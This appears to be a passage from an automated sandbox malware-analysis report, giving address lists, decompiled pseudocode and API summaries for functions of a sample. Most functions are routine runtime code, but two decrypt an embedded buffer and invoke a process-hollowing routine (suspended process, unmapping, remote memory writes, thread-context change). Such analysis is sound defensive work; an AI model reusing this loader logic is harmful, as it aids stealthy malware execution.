    0x0040d92c
    0x0040d93c
    0x0040d943
    0x0040d943
    0x0040d94e
    0x0040d95c
    0x0040d96b
    0x0040d989
    0x0040d96d
    0x0040d978
    0x0040d978
    0x0040d998
    0x0040d9a4
    0x0040d9a7
    0x0040d9a9
    0x0040d9aa
    0x0040d9ac
    0x0040d9b2
    0x0040d9b4
    0x0040d9c3
    0x0040d9c4
    0x0040d9ce
    0x0040d9cf
    0x0040d9d4
    0x0040d9df
    0x0040d9e0
    0x0040d9ea
    0x0040d9eb
    0x0040d9f0
    0x0040da0b
    0x0040da0d
    0x0040da0e
    0x0040da11
    0x0040da11
    0x0040d9b2
    0x0040da1a
    0x0040da1d
    0x0040da1f
    0x0040da20
    0x0040da26
    0x0040da2c
    0x0040da2e
    0x0040da30
    0x0040da33
    0x0040da36
    0x0040da36
    0x0040da39
    0x00000000
    0x00000000
    0x00000000
    0x0040da39
    0x0040da39
    0x0040da40
    0x0040da4b
    0x0040da53
    0x0040da5a
    0x0040da61
    0x0040da62
    0x0040da67
    0x0040da72
    0x0040da72
    0x0040da80
    0x0040da84
    0x0040da8a
    0x0040da8b
    0x0040da9b

    APIs
    • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 0040D9CF
    • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 0040D9EB
    • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 0040DA62
    • VariantClear.OLEAUT32(?), ref: 0040DA8B
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040B3A0, Relevance: 6.1, APIs: 4, Instructions: 95
    C-Code - Quality: 100%
    			E0040B3A0() {
				char _v152;
				short _v410;
				signed short _t14;
				signed int _t16;
				int _t18;
				void* _t20;
				void* _t23;
				int _t24;
				int _t26;
				signed int _t30;
				signed int _t31;
				signed int _t32;
				signed int _t37;
				int* _t39;
				short* _t41;
				void* _t49;

				 *0x454738 = 0x409;
				 *0x45473c = 9;
				 *0x454740 = 1;
				_t14 = GetThreadLocale();
				if(_t14 != 0) {
					 *0x454738 = _t14;
				}
				if(_t14 != 0) {
					 *0x45473c = _t14 & 0x3ff;
					 *0x454740 = (_t14 & 0x0000ffff) >> 0xa;
				}
				memcpy(0x419108, 0x40b4f4, 8 << 2);
				if( *0x4190c0 != 2) {
					_t16 = GetSystemMetrics(0x4a);
					__eflags = _t16;
					 *0x454745 = _t16 & 0xffffff00 | _t16 != 0x00000000;
					_t18 = GetSystemMetrics(0x2a);
					__eflags = _t18;
					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
					 *0x454744 = _t31;
					__eflags = _t31;
					if(__eflags != 0) {
						return E0040B328(__eflags, _t49);
					}
				} else {
					_t20 = E0040B388();
					if(_t20 != 0) {
						 *0x454745 = 0;
						 *0x454744 = 0;
						return _t20;
					}
					E0040B328(__eflags, _t49);
					_t37 = 0x20;
					_t23 = E00402C54(0x419108, 0x20, 0x40b4f4);
					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
					 *0x454744 = _t32;
					__eflags = _t32;
					if(_t32 != 0) {
						 *0x454745 = 0;
						return _t23;
					}
					_t24 = 0x80;
					_t39 =  &_v152;
					do {
						 *_t39 = _t24;
						_t24 = _t24 + 1;
						_t39 =  &(_t39[0]);
						__eflags = _t24 - 0x100;
					} while (_t24 != 0x100);
					_t26 =  *0x454738; // 0x409
					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
					_t18 = 0x80;
					_t41 =  &_v410;
					while(1) {
						__eflags =  *_t41 - 2;
						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
						 *0x454745 = _t37;
						__eflags = _t37;
						if(_t37 != 0) {
							goto L17;
						}
						_t41 = _t41 + 2;
						_t18 = _t18 - 1;
						__eflags = _t18;
						if(_t18 != 0) {
							continue;
						} else {
							return _t18;
						}
						L18:
					}
				}
				L17:
				return _t18;
				goto L18;
			}



















    0x0040b3ac
    0x0040b3b6
    0x0040b3c0
    0x0040b3ca
    0x0040b3d1
    0x0040b3d3
    0x0040b3d3
    0x0040b3db
    0x0040b3e7
    0x0040b3f3
    0x0040b3f3
    0x0040b407
    0x0040b410
    0x0040b4bf
    0x0040b4c4
    0x0040b4c9
    0x0040b4d0
    0x0040b4d5
    0x0040b4d7
    0x0040b4da
    0x0040b4e0
    0x0040b4e2
    0x00000000
    0x0040b4ea
    0x0040b416
    0x0040b416
    0x0040b41d
    0x0040b41f
    0x0040b426
    0x00000000
    0x0040b426
    0x0040b433
    0x0040b443
    0x0040b445
    0x0040b44a
    0x0040b44d
    0x0040b453
    0x0040b455
    0x0040b457
    0x00000000
    0x0040b457
    0x0040b463
    0x0040b468
    0x0040b46e
    0x0040b46e
    0x0040b470
    0x0040b471
    0x0040b472
    0x0040b472
    0x0040b48e
    0x0040b494
    0x0040b499
    0x0040b49e
    0x0040b4a4
    0x0040b4a4
    0x0040b4a8
    0x0040b4ab
    0x0040b4b1
    0x0040b4b3
    0x00000000
    0x00000000
    0x0040b4b5
    0x0040b4b8
    0x0040b4b8
    0x0040b4b9
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040b4b9
    0x0040b4a4
    0x0040b4f1
    0x0040b4f1
    0x00000000

    APIs
    • GetThreadLocale.KERNEL32 ref: 0040B3CA
    • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
    • GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
    • GetSystemMetrics.USER32(0000002A), ref: 0040B4D0
      • Part of subcall function 0040B328: GetCPInfo.KERNEL32(00000000,?), ref: 0040B341
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040152C, Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 45
    C-Code - Quality: 100%
    			E0040152C(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4);
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4);
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E0040137C(0x4545e4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









    0x00401530
    0x00401532
    0x00401534
    0x00401536
    0x0040154a
    0x0040154f
    0x00401551
    0x00401555
    0x0040155d
    0x00401563
    0x0040156f
    0x00401574
    0x00401574
    0x00401579
    0x00401582
    0x00401589
    0x00401595
    0x0040159c
    0x00000000
    0x0040159c
    0x00401589
    0x004015a2

    APIs
    • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040154A
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 0040156F
    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,004545F4,?,?,?,00401898), ref: 00401595
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00405E00, Relevance: 6.0, APIs: 4, Instructions: 11
    C-Code - Quality: 100%
    			E00405E00(void* __eax, int __ecx, long __edx) {
				void* _t2;
				void* _t4;

				_t2 = GlobalHandle(__eax);
				GlobalUnWire(_t2);
				_t4 = GlobalReAlloc(_t2, __edx, __ecx);
				GlobalFix(_t4);
				return _t4;
			}





    0x00405e03
    0x00405e0a
    0x00405e0f
    0x00405e15
    0x00405e1a

    APIs
    • GlobalHandle.KERNEL32 ref: 00405E03
    • GlobalUnWire.KERNEL32(00000000), ref: 00405E0A
    • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00405E0F
    • GlobalFix.KERNEL32(00000000), ref: 00405E15
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00408B80, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74
    C-Code - Quality: 72%
    			E00408B80(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				char _v280;
				char* _t32;
				intOrPtr* _t49;
				intOrPtr _t58;
				void* _t63;
				void* _t67;

				_v8 = 0;
				_t49 = __edx;
				_t63 = __eax;
				_push(_t67);
				_push(0x408c5e);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffeec;
				E00403E88(__edx);
				_v24 =  *((intOrPtr*)(_a4 - 0xe));
				_v22 =  *((intOrPtr*)(_a4 - 0x10));
				_v18 =  *((intOrPtr*)(_a4 - 0x12));
				if(_t63 > 2) {
					E00403F20( &_v8, 0x408c80);
				} else {
					E00403F20( &_v8, 0x408c74);
				}
				_t32 = E00404348(_v8);
				if(GetDateFormatA(GetThreadLocale(), 4,  &_v24, _t32,  &_v280, 0x100) != 0) {
					E004040F8(_t49, 0x100,  &_v280);
					if(_t63 == 1 &&  *((char*)( *_t49)) == 0x30) {
						E004043A8( *_t49, E00404148( *_t49) - 1, 2, _t49);
					}
				}
				_pop(_t58);
				 *[fs:eax] = _t58;
				_push(E00408C65);
				return E00403E88( &_v8);
			}













    0x00408b8d
    0x00408b90
    0x00408b92
    0x00408b96
    0x00408b97
    0x00408b9c
    0x00408b9f
    0x00408ba4
    0x00408bb0
    0x00408bbb
    0x00408bc6
    0x00408bcd
    0x00408be6
    0x00408bcf
    0x00408bd7
    0x00408bd7
    0x00408bfa
    0x00408c13
    0x00408c22
    0x00408c28
    0x00408c43
    0x00408c43
    0x00408c28
    0x00408c4a
    0x00408c4d
    0x00408c50
    0x00408c5d

    APIs
    • GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,00408C5E), ref: 00408C06
    • GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100), ref: 00408C0C
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0041844E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
    C-Code - Quality: 50%
    			E0041844E() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t31;
				signed int _t34;
				void* _t38;
				void* _t39;
				void* _t45;
				void* _t51;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(_t45);
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xffffffd0;
				GetSystemInfo( &_v40);
				_t34 = 0;
				_t31 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t34 == 0x20) {
						_t34 = 0;
					}
					_t5 = (_t34 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t30 = ( *_t15 - _t34 ^  *_t5) + _t34;
					 *_t15 = ( *_t15 - _t34 ^  *_t5) + _t34;
					_t34 = _t34 + 1;
					_t15 = _t15 + 1;
					_t31 = _t31 - 1;
				} while (_t31 != 0);
				L5:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t51, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t38);
				E00417F5C(_v52, _t30, 0x41944c, _t38, _t39, _t42, _t51);
				goto L5;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418465
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 00418450, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59
    C-Code - Quality: 53%
    			E00418450() {
				struct _SYSTEM_INFO _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr* _t15;
				void* _t30;
				signed int _t33;
				void* _t37;
				void* _t38;
				intOrPtr _t42;
				void* _t47;

				_v44 = 0;
				_v52 = 0;
				_v48 = 0;
				_push(0x418517);
				_push( *[fs:eax]);
				 *[fs:eax] = _t42;
				GetSystemInfo( &_v40);
				_t33 = 0;
				_t30 = 0x39a91;
				_t15 = 0x41944c;
				do {
					if(_t33 == 0x20) {
						_t33 = 0;
					}
					_t5 = (_t33 & 0x000000ff) + 0x452ee0; // 0x8845645c
					_t29 = ( *_t15 - _t33 ^  *_t5) + _t33;
					 *_t15 = ( *_t15 - _t33 ^  *_t5) + _t33;
					_t33 = _t33 + 1;
					_t15 = _t15 + 1;
					_t30 = _t30 - 1;
				} while (_t30 != 0);
				L4:
				_push("h`JE");
				_push("-t ");
				_push(0);
				E004070E8( &_v48, _t47, _v40.dwNumberOfProcessors >> 1);
				_push(_v48);
				_push(0x41853c);
				_push( *0x454a5c);
				E00404208();
				_push(_v44);
				E004029A4(0,  &_v52);
				_pop(_t37);
				E00417F5C(_v52, _t29, 0x41944c, _t37, _t38, _t40, _t47);
				goto L4;
			}














    0x0041845a
    0x0041845d
    0x00418460
    0x00418466
    0x0041846b
    0x0041846e
    0x00418475
    0x0041847a
    0x0041847c
    0x00418481
    0x00418486
    0x00418489
    0x0041848b
    0x0041848b
    0x00418499
    0x0041849f
    0x004184a1
    0x004184a3
    0x004184a4
    0x004184a5
    0x004184a5
    0x004184a8
    0x004184a8
    0x004184ad
    0x004184b9
    0x004184be
    0x004184c3
    0x004184c6
    0x004184cb
    0x004184d9
    0x004184e1
    0x004184e7
    0x004184f4
    0x004184f5
    0x00000000

    APIs
    • GetSystemInfo.KERNEL32(?,00000000,00418517), ref: 00418475
      • Part of subcall function 004029A4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,?,?,004187BF,00000000,00418925,?,00000000,00418974), ref: 004029C8
      • Part of subcall function 004029A4: GetCommandLineA.KERNEL32(?,?,?,004187BF,00000000,00418925,?,00000000,00418974,?,?,?,?,00000007,00000000,00000000), ref: 004029DA
      • Part of subcall function 00417F5C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 0041802B
      • Part of subcall function 00417F5C: GetThreadContext.KERNEL32(?,00000000), ref: 00418066
      • Part of subcall function 00417F5C: ReadProcessMemory.KERNEL32(?,?,?,00000004,?,00000000,00418218), ref: 0041808E
      • Part of subcall function 00417F5C: NtUnmapViewOfSection.N(?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180A3
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180BF
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?,?,?,?,00000004,?,00000000,00418218), ref: 004180DA
      • Part of subcall function 00417F5C: VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,?,?,00000004,?,00000000,00418218), ref: 004180F7
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,00000000,00000000,?,?,?,?,?,00003000,00000040,?,?,?,00000004,?,00000000), ref: 0041814F
      • Part of subcall function 00417F5C: WriteProcessMemory.KERNEL32(?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040,?), ref: 0041816F
      • Part of subcall function 00417F5C: SetThreadContext.KERNEL32(?,00000000), ref: 0041818B
      • Part of subcall function 00417F5C: ResumeThread.KERNEL32(?,?,?,00000000,00000004,?,?,00000000,00000000,?,?,?,?,?,00003000,00000040), ref: 00418194
      • Part of subcall function 00417F5C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0041819F
      • Part of subcall function 00417F5C: TerminateThread.KERNEL32(?,00000000,00000000,004181D0,?,?,?,?,00000000,00000004,?,?,00000000,00000000,?,?), ref: 004181B8
      • Part of subcall function 00417F5C: CloseHandle.KERNEL32(?), ref: 004181C1
      • Part of subcall function 00417F5C: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00418218), ref: 004181E5
      • Part of subcall function 00417F5C: TerminateProcess.KERNEL32(?,00000000,00000000,00418218), ref: 004181F8
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040BC54, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39
    C-Code - Quality: 83%
    			E0040BC54(void* __edx) {
				void* _t6;
				void* _t13;
				void* _t17;
				void* _t20;
				void* _t21;
				void* _t22;

				_t17 = __edx;
				if(__edx != 0) {
					_t22 = _t22 + 0xfffffff0;
					_t6 = E00403404(_t6, _t21);
				}
				_t20 = _t6;
				E004030E4(0);
				 *((intOrPtr*)(_t20 + 0xc)) = 0xffff;
				 *((intOrPtr*)(_t20 + 0x10)) = CreateEventA(0, 0xffffffff, 0xffffffff, 0);
				 *((intOrPtr*)(_t20 + 0x14)) = CreateEventA(0, 0, 0, 0);
				 *(_t20 + 0x18) = 0xffffffff;
				 *((intOrPtr*)(_t20 + 0x20)) = E004030E4(1);
				_t13 = _t20;
				if(_t17 != 0) {
					E0040345C(_t13);
					_pop( *[fs:0x0]);
				}
				return _t20;
			}









    0x0040bc54
    0x0040bc58
    0x0040bc5a
    0x0040bc5d
    0x0040bc5d
    0x0040bc64
    0x0040bc6a
    0x0040bc6f
    0x0040bc83
    0x0040bc93
    0x0040bc96
    0x0040bca9
    0x0040bcac
    0x0040bcb0
    0x0040bcb2
    0x0040bcb7
    0x0040bcbe
    0x0040bcc5

    APIs
    • CreateEventA.KERNEL32(00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC7E
    • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,000000FF,000000FF,00000000,?,?,004169E5,00000000,00416A39), ref: 0040BC8E
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 004179B4, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9
    C-Code - Quality: 100%
    			E004179B4(void* __eax) {
				void* _t3;

				L0040C518();
				if(__eax != 0) {
					_t3 = E0040A56C("WSACleanup", 1);
					E0040386C();
					return _t3;
				}
				return __eax;
			}




    0x004179b4
    0x004179bb
    0x004179c9
    0x004179ce
    0x00000000
    0x004179ce
    0x004179d3

    APIs
    • WSACleanup.WSOCK32(00417A06,00000000,00417A14), ref: 004179B4
    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0040F0A8, Relevance: 5.1, Strings: 4, Instructions: 85
    C-Code - Quality: 78%
    			E0040F0A8(signed int __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				void* _v8;
				char _v264;
				char _v520;
				char _v524;
				signed char _t47;
				intOrPtr* _t59;
				intOrPtr _t61;
				intOrPtr* _t75;
				void* _t78;

				_v524 = 0;
				_t75 = __edx;
				_t47 = __eax;
				_push(_t78);
				_push(0x40f1ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t78 + 0xfffffdf8;
				_t73 = __eax & 0x00000fff;
				if((__eax & 0x00000fff) > 0x14) {
					if(__eax != 0x100) {
						if(__eax != 0x101) {
							if(E0040F504(__eax,  &_v8) == 0) {
								E00407110( &_v524, 4);
								_t59 =  *0x4530ec; // 0x419128
								E00404194(_t75, _v524,  *_t59);
							} else {
								E00403064( *_v8,  &_v520);
								E004027B4( &_v520, 0x7fffffff, 2,  &_v264);
								E004040EC(__edx,  &_v264);
							}
						} else {
							E00403EDC(__edx, 0x40f1f4);
						}
					} else {
						E00403EDC(__edx, "String");
					}
				} else {
					E00403EDC(__edx,  *((intOrPtr*)(0x419358 + (_t73 & 0x0000ffff) * 4)));
				}
				if((_t47 & 0x00000020) != 0) {
					E00404194(_t75,  *_t75, "Array ");
				}
				if((_t47 & 0x00000040) != 0) {
					E00404194(_t75,  *_t75, "ByRef ");
				}
				_pop(_t61);
				 *[fs:eax] = _t61;
				_push(E0040F1D5);
				return E00403E88( &_v524);
			}












    0x0040f0b6
    0x0040f0bc
    0x0040f0be
    0x0040f0c2
    0x0040f0c3
    0x0040f0c8
    0x0040f0cb
    0x0040f0d0
    0x0040f0d9
    0x0040f0f6
    0x0040f10e
    0x0040f12a
    0x0040f175
    0x0040f180
    0x0040f18a
    0x0040f12c
    0x0040f13e
    0x0040f153
    0x0040f160
    0x0040f160
    0x0040f110
    0x0040f117
    0x0040f117
    0x0040f0f8
    0x0040f0ff
    0x0040f0ff
    0x0040f0db
    0x0040f0e7
    0x0040f0e7
    0x0040f192
    0x0040f19d
    0x0040f19d
    0x0040f1a5
    0x0040f1b0
    0x0040f1b0
    0x0040f1b7
    0x0040f1ba
    0x0040f1bd
    0x0040f1cd

    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0041381C, Relevance: 5.1, Strings: 4, Instructions: 71
    C-Code - Quality: 82%
    			E0041381C(intOrPtr __eax, void* __ebx, char* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				char _v12;
				char* _t15;
				char* _t23;
				intOrPtr _t30;
				char _t31;
				intOrPtr _t39;
				intOrPtr _t42;
				void* _t45;

				_v12 = 0;
				_t23 = __edx;
				_push(_t45);
				_push(0x4138c2);
				_push( *[fs:eax]);
				 *[fs:eax] = _t45 + 0xfffffff8;
				_v8 = 0;
				if(__edx != 0) {
					_t39 = __eax;
					while( *_t23 != 0) {
						_t15 = _t23;
						while(1) {
							_t31 =  *_t23;
							if(_t31 == 0 || _t31 + 0xd3 - 2 < 0) {
								break;
							}
							_t23 = _t23 + 1;
						}
						E00403F78( &_v12, _t23 - _t15, _t15);
						_t42 = E004165D4(_t39, _t23 - _t15, _v12);
						if(_t42 == 0 && E00406E50(_v12, 0x4138dc) != 0) {
							_t42 = _t39;
						}
						if(_t42 != 0) {
							if( *_t23 == 0x2e) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x2d) {
								_t23 = _t23 + 1;
							}
							if( *_t23 == 0x3e) {
								_t23 = _t23 + 1;
							}
							_t39 = _t42;
							continue;
						}
						goto L19;
					}
					_v8 = _t39;
				}
				L19:
				_pop(_t30);
				 *[fs:eax] = _t30;
				_push(E004138C9);
				return E00403E88( &_v12);
			}












    0x00413827
    0x0041382a
    0x00413830
    0x00413831
    0x00413836
    0x00413839
    0x0041383e
    0x00413843
    0x00413845
    0x004138a4
    0x00413849
    0x0041384e
    0x0041384e
    0x00413852
    0x00000000
    0x00000000
    0x0041384d
    0x0041384d
    0x00413864
    0x00413873
    0x00413877
    0x0041388a
    0x0041388a
    0x0041388e
    0x00413893
    0x00413895
    0x00413895
    0x00413899
    0x0041389b
    0x0041389b
    0x0041389f
    0x004138a1
    0x004138a1
    0x004138a2
    0x00000000
    0x004138a2
    0x00000000
    0x0041388e
    0x004138a9
    0x004138a9
    0x004138ac
    0x004138ae
    0x004138b1
    0x004138b4
    0x004138c1

    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_12_2_400000_obtG43AWHP.jbxd
    Function 0041498C, Relevance: 5.0, Strings: 4, Instructions: 50
    C-Code - Quality: 96%
    			E0041498C(void* __eax, void* __ecx, void* __edx) {
				signed int _t7;
				void* _t8;
				void* _t17;
				void* _t29;

				_push(__ecx);
				_t29 = __edx;
				_t17 = __eax;
				_t7 = E004155CC(__ecx) & 0x0000007f;
				if(_t7 > 0xd) {
					L7:
					_t8 = E00413A2C();
				} else {
					_t1 = _t7 + E004149B3; // 0x5
					switch( *((intOrPtr*)( *_t1 * 4 +  &M004149C1))) {
						case 0:
							goto L7;
						case 1:
							E00413F54(_t17, 1, _t30);
							E00403F78(_t29,  *_t30, 0);
							_t8 = E00413F54(_t17,  *_t30, E004043A0(_t29));
							goto L8;
						case 2:
							__eax = __esi;
							__edx = 0x414a58;
							__eax = E00403EDC(__esi, 0x414a58);
							goto L8;
						case 3:
							__eax = __esi;
							__edx = 0x414a68;
							__eax = E00403EDC(__esi, 0x414a68);
							goto L8;
						case 4:
							__eax = __esi;
							__edx = 0x414a78;
							__eax = E00403EDC(__esi, 0x414a78);
							goto L8;
						case 5:
							__eax = __esi;
							__edx = 0x414a84;
							__eax = E00403EDC(__esi, 0x414a84);
							goto L8;
					}
				}
				L8:
				return _t8;
			}







    0x0041498e
    0x0041498f
    0x00414991
    0x0041499a
    0x004149a0
    0x00414a44
    0x00414a44
    0x004149a6
    0x004149a6
    0x004149ac
    0x00000000
    0x00000000
    0x00000000
    0x004149e2
    0x004149f0
    0x00414a05
    0x00000000
    0x00000000
    0x00414a0c
    0x00414a0e
    0x00414a13
    0x00000000
    0x00000000
    0x00414a1a
    0x00414a1c
    0x00414a21
    0x00000000
    0x00000000
    0x00414a28
    0x00414a2a
    0x00414a2f
    0x00000000
    0x00000000
    0x00414a36
    0x00414a38
    0x00414a3d
    0x00000000
    0x00000000
    0x004149ac
    0x00414a49
    0x00414a4c

    Strings
    Memory Dump Source
    • Source File: 0000000C.00000002.1513813098.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
